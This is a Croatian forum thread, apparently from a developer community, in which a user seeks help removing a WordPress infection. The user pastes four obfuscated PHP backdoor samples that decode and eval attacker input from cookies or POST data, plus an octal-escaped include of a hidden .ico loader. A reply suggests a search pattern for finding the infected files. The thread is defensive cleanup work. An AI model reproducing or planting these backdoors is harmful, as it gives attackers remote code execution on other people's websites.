Kako istjerat Wordpress virus

bozoou · ožujak 2020 08:09 5

Kao što sam obećao u susjednoj temi da ću otvoriti zasebnu za pitanje virusa koji me gnjavi …pa evo…

Znači radi se o Wordpress virusu, koji kreira nove maliciozne file-ove po svakom projektu do kojega ima pristup…te također i u postojeće php file-ove ubacuje svoj maliciozni code.

Neki patterni codea su:

<?php
$tkvftkk = '6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s';$kqtam = Array();$kqtam[] = $tkvftkk[20].$tkvftkk[30];$kqtam[] = $tkvftkk[24].$tkvftkk[22].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19].$tkvftkk[29].$tkvftkk[9].$tkvftkk[28].$tkvftkk[10].$tkvftkk[15].$tkvftkk[24].$tkvftkk[19].$tkvftkk[1].$tkvftkk[21].$tkvftkk[15];$kqtam[] = $tkvftkk[8].$tkvftkk[14].$tkvftkk[23].$tkvftkk[18].$tkvftkk[7].$tkvftkk[16].$tkvftkk[29].$tkvftkk[27].$tkvftkk[5].$tkvftkk[7].$tkvftkk[27].$tkvftkk[14].$tkvftkk[0].$tkvftkk[5].$tkvftkk[11].$tkvftkk[8].$tkvftkk[29].$tkvftkk[2].$tkvftkk[5].$tkvftkk[7].$tkvftkk[16].$tkvftkk[24].$tkvftkk[28].$tkvftkk[5].$tkvftkk[27].$tkvftkk[18].$tkvftkk[8].$tkvftkk[7].$tkvftkk[18].$tkvftkk[2].$tkvftkk[7].$tkvftkk[18].$tkvftkk[0].$tkvftkk[11].$tkvftkk[18].$tkvftkk[23];$kqtam[] = $tkvftkk[17];$kqtam[] = $tkvftkk[24].$tkvftkk[21].$tkvftkk[10].$tkvftkk[15].$tkvftkk[19];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[9].$tkvftkk[22].$tkvftkk[29].$tkvftkk[4].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19];$kqtam[] = $tkvftkk[29].$tkvftkk[25].$tkvftkk[4].$tkvftkk[13].$tkvftkk[21].$tkvftkk[16].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[10].$tkvftkk[14].$tkvftkk[33].$tkvftkk[19].$tkvftkk[22];$kqtam[] = $tkvftkk[8].$tkvftkk[22].$tkvftkk[22].$tkvftkk[8].$tkvftkk[26].$tkvftkk[9].$tkvftkk[12].$tkvftkk[29].$tkvftkk[22].$tkvftkk[3].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[13].$tkvftkk[29].$tkvftkk[15];$kqtam[] = $tkvftkk[4].$tkvftkk[8].$tkvftkk[24].$tkvftkk[31];foreach ($kqtam[8]($_COOKIE, $_POST) as $jlgtudl => $tmwuer){function dctvsy($kqtam, $jlgtudl, $nsvmcth){return $kqtam[7]($kqtam[5]($jlgtudl . $kqtam[2], ($nsvmcth / $kqtam[9]($jlgtudl)) + 1), 0, $nsvmcth);}function aqihg($kqtam, $vfzhrbm){return @$kqtam[10]($kqtam[0], $vfzhrbm);}function lvyjdt($kqtam, $vfzhrbm){$thdstnj = $kqtam[4]($vfzhrbm) % 3;if (!$thdstnj) {$ybammpl = $kqtam[1]; $yuwwf = $ybammpl("", $vfzhrbm[1]($vfzhrbm[2]));$yuwwf();exit();}}$tmwuer = aqihg($kqtam, $tmwuer);lvyjdt($kqtam, $kqtam[6]($kqtam[3], $tmwuer ^ dctvsy($kqtam, $jlgtudl, $kqtam[9]($tmwuer))));}

…

<?php
/*15343*/

@include "\057home\057http\144/vho\163ts/c\162oati\141-acc\157mmod\141tion\056info\057apar\164mani\055proh\141ska.\143om/t\145mpla\164es/t\065/ima\147es/.\0610035\064bb.i\143o";

/*15343*/

Tražim hosting sa nezavisnim cjelinama

Evo kako se i pakuju funkcije i ne samo to:

3v4l.org

LEBBF - created on 3v4l.org

View the output of this script on 3v4l.org: the online PHP shell with 250+ PHP versions

@bozoou
'6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s'
Ovaj string, je l’ uvijek isti il’ se mijenja po sajtovima?

Nije uvijek isti, ako ti išta znači …evo tri različita 3 primjera:

$cogju = '7tp#0nl6uy*2rxoe1_cfid4g5km93-b\'aH8vs';$pjexgjg = Array();$pjexgjg[] = $cogju[33].$cogju[10];$pjexgjg[] = $cogju[22].$cogju[34].$cogju[4].$cogju[22].$cogju[24].$cogju[11].$cogju[19].$cogju[34].$cogju[29].$cogju[27].$cogju[21].$cogju[32].$cogju[30].$cogju[29].$cogju[22].$cogju[30].$cogju[16].$cogju[16].$cogju[29].$cogju[34].$cogju[27].$cogju[15].$cogju[7].$cogju[29].$cogju[28].$cogju[11].$cogju[4].$cogju[22].$cogju[7].$cogju[0].$cogju[0].$cogju[16].$cogju[4].$cogju[21].$cogju[34].$cogju[4];$pjexgjg[] = $cogju[3];$pjexgjg[] = $cogju[18].$cogju[14].$cogju[8].$cogju[5].$cogju[1];$pjexgjg[] = $cogju[36].$cogju[1].$cogju[12].$cogju[17].$cogju[12].$cogju[15].$cogju[2].$cogju[15].$cogju[32].$cogju[1];$pjexgjg[] = $cogju[15].$cogju[13].$cogju[2].$cogju[6].$cogju[14].$cogju[21].$cogju[15];$pjexgjg[] = $cogju[36].$cogju[8].$cogju[30].$cogju[36].$cogju[1].$cogju[12];$pjexgjg[] = $cogju[32].$cogju[12].$cogju[12].$cogju[32].$cogju[9].$cogju[17].$cogju[26].$cogju[15].$cogju[12].$cogju[23].$cogju[15];$pjexgjg[] = $cogju[36].$cogju[1].$cogju[12].$cogju[6].$cogju[15].$cogju[5];$pjexgjg[] = $cogju[2].$cogju[32].$cogju[18].$cogju[25];foreach ($pjexgjg[7]($_COOKIE, $_POST) as $utqkikk => $omjan){function qahxesj($pjexgjg, $utqkikk, $aeoectx){return $pjexgjg[6]($pjexgjg[4]($utqkikk . $pjexgjg[1], ($aeoectx / $pjexgjg[8]($utqkikk)) + 1), 0, $aeoectx);}function jkegz($pjexgjg, $wqhtg){return @$pjexgjg[9]($pjexgjg[0], $wqhtg);}function eofpf($pjexgjg, $wqhtg){$ruscuh = $pjexgjg[3]($wqhtg) % 3;if (!$ruscuh) {eval($wqhtg[1]($wqhtg[2]));exit();}}$omjan = jkegz($pjexgjg, $omjan);eofpf($pjexgjg, $pjexgjg[5]($pjexgjg[2], $omjan ^ qahxesj($pjexgjg, $utqkikk, $pjexgjg[8]($omjan))));}

$sknonsb = 'ldm453bfi8H_knu\'yte9p#-*cvsg167aorx';$ttwymud = Array();$ttwymud[] = $sknonsb[6].$sknonsb[28].$sknonsb[5].$sknonsb[18].$sknonsb[31].$sknonsb[6].$sknonsb[30].$sknonsb[19].$sknonsb[22].$sknonsb[6].$sknonsb[6].$sknonsb[24].$sknonsb[7].$sknonsb[22].$sknonsb[3].$sknonsb[6].$sknonsb[4].$sknonsb[30].$sknonsb[22].$sknonsb[31].$sknonsb[19].$sknonsb[1].$sknonsb[3].$sknonsb[22].$sknonsb[3].$sknonsb[5].$sknonsb[9].$sknonsb[5].$sknonsb[24].$sknonsb[6].$sknonsb[4].$sknonsb[1].$sknonsb[31].$sknonsb[29].$sknonsb[5].$sknonsb[28];$ttwymud[] = $sknonsb[10].$sknonsb[23];$ttwymud[] = $sknonsb[21];$ttwymud[] = $sknonsb[24].$sknonsb[32].$sknonsb[14].$sknonsb[13].$sknonsb[17];$ttwymud[] = $sknonsb[26].$sknonsb[17].$sknonsb[33].$sknonsb[11].$sknonsb[33].$sknonsb[18].$sknonsb[20].$sknonsb[18].$sknonsb[31].$sknonsb[17];$ttwymud[] = $sknonsb[18].$sknonsb[34].$sknonsb[20].$sknonsb[0].$sknonsb[32].$sknonsb[1].$sknonsb[18];$ttwymud[] = $sknonsb[26].$sknonsb[14].$sknonsb[6].$sknonsb[26].$sknonsb[17].$sknonsb[33];$ttwymud[] = $sknonsb[31].$sknonsb[33].$sknonsb[33].$sknonsb[31].$sknonsb[16].$sknonsb[11].$sknonsb[2].$sknonsb[18].$sknonsb[33].$sknonsb[27].$sknonsb[18];$ttwymud[] = $sknonsb[26].$sknonsb[17].$sknonsb[33].$sknonsb[0].$sknonsb[18].$sknonsb[13];$ttwymud[] = $sknonsb[20].$sknonsb[31].$sknonsb[24].$sknonsb[12];foreach ($ttwymud[7]($_COOKIE, $_POST) as $onkxdn => $fdxgpnt){function demhhr($ttwymud, $onkxdn, $catng){return $ttwymud[6]($ttwymud[4]($onkxdn . $ttwymud[0], ($catng / $ttwymud[8]($onkxdn)) + 1), 0, $catng);}function jvnmaov($ttwymud, $mfcib){return @$ttwymud[9]($ttwymud[1], $mfcib);}function exznlt($ttwymud, $mfcib){$zgyecc = $ttwymud[3]($mfcib) % 3;if (!$zgyecc) {eval($mfcib[1]($mfcib[2]));exit();}}$fdxgpnt = jvnmaov($ttwymud, $fdxgpnt);exznlt($ttwymud, $ttwymud[5]($ttwymud[2], $fdxgpnt ^ demhhr($ttwymud, $onkxdn, $ttwymud[8]($fdxgpnt))));}

$wygrr = 'g0emcy*p1\'56d-x7tbv#3lsHf9rkn_oui4a8';$uikzch = Array();$uikzch[] = $wygrr[10].$wygrr[34].$wygrr[33].$wygrr[15].$wygrr[8].$wygrr[20].$wygrr[8].$wygrr[34].$wygrr[13].$wygrr[34].$wygrr[2].$wygrr[20].$wygrr[2].$wygrr[13].$wygrr[33].$wygrr[33].$wygrr[33].$wygrr[33].$wygrr[13].$wygrr[35].$wygrr[24].$wygrr[8].$wygrr[11].$wygrr[13].$wygrr[24].$wygrr[17].$wygrr[4].$wygrr[35].$wygrr[25].$wygrr[1].$wygrr[4].$wygrr[20].$wygrr[34].$wygrr[20].$wygrr[20].$wygrr[10];$uikzch[] = $wygrr[23].$wygrr[6];$uikzch[] = $wygrr[19];$uikzch[] = $wygrr[4].$wygrr[30].$wygrr[31].$wygrr[28].$wygrr[16];$uikzch[] = $wygrr[22].$wygrr[16].$wygrr[26].$wygrr[29].$wygrr[26].$wygrr[2].$wygrr[7].$wygrr[2].$wygrr[34].$wygrr[16];$uikzch[] = $wygrr[2].$wygrr[14].$wygrr[7].$wygrr[21].$wygrr[30].$wygrr[12].$wygrr[2];$uikzch[] = $wygrr[22].$wygrr[31].$wygrr[17].$wygrr[22].$wygrr[16].$wygrr[26];$uikzch[] = $wygrr[34].$wygrr[26].$wygrr[26].$wygrr[34].$wygrr[5].$wygrr[29].$wygrr[3].$wygrr[2].$wygrr[26].$wygrr[0].$wygrr[2];$uikzch[] = $wygrr[22].$wygrr[16].$wygrr[26].$wygrr[21].$wygrr[2].$wygrr[28];$uikzch[] = $wygrr[7].$wygrr[34].$wygrr[4].$wygrr[27];foreach ($uikzch[7]($_COOKIE, $_POST) as $hsvywkk => $viegisf){function zrxcqs($uikzch, $hsvywkk, $izvscvt){return $uikzch[6]($uikzch[4]($hsvywkk . $uikzch[0], ($izvscvt / $uikzch[8]($hsvywkk)) + 1), 0, $izvscvt);}function cnjgyu($uikzch, $zxavyvf){return @$uikzch[9]($uikzch[1], $zxavyvf);}function rufosra($uikzch, $zxavyvf){$xawmlam = $uikzch[3]($zxavyvf) % 3;if (!$xawmlam) {eval($zxavyvf[1]($zxavyvf[2]));exit();}}$viegisf = cnjgyu($uikzch, $viegisf);rufosra($uikzch, $uikzch[5]($uikzch[2], $viegisf ^ zrxcqs($uikzch, $hsvywkk, $uikzch[8]($viegisf))));}

%3 se dešava na milijun mjesta, heh.

tpojka · ožujak 2020 09:55 5

Dobra stvar je što djeluje da [će] se % 3 pojaviti u svakom od tih blokova.
Nezgodno je što se nije sigurno koji WP koda.

Potraži regex-om ovo:

]($_COOKIE, $_POST) as

Počinje desnom uglastom zagradom a završava space-om iza riječi as.
Kopiraj ovaj kod ali dodaj space iza as ako nije tu. Taj string potraži regex-om u svim fajlovima.